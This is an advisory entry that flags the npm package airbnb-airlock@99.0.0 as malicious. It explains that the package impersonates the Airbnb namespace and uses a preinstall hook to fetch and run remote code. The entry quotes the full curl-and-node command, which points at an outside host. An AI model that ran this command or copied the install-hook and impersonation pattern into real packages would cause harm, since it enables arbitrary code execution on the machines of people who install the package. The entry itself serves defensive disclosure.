npm

airbnb-airlock@99.0.0

Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC

Malicious

OSV ID: MAL-2026-6293

Ecosystem: npm

Summary

The package's preinstall lifecycle hook in package.json runs 'curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js', fetching an unpinned JavaScript file from poc.amanrawat.com and immediately executing it with node during npm install. The fetched content is mutable and entirely controlled by the operator of that domain: installers run whatever bytes are served at install time, with no hash or signature verification. The package ships no other functional content; the remote fetch-and-execute is its only behavior. The package name uses the 'airbnb-' prefix to impersonate the Airbnb open-source namespace while being published by an unrelated author with a placeholder description ('Test') and an inflated version (99.0.0), consistent with namespace impersonation intended to lure installers searching for Airbnb tooling.

Source: amazon-inspector (034fd98a2ccd98f2bec2201d130c5a102ad17907c37af34b5162592e26a0fd43)
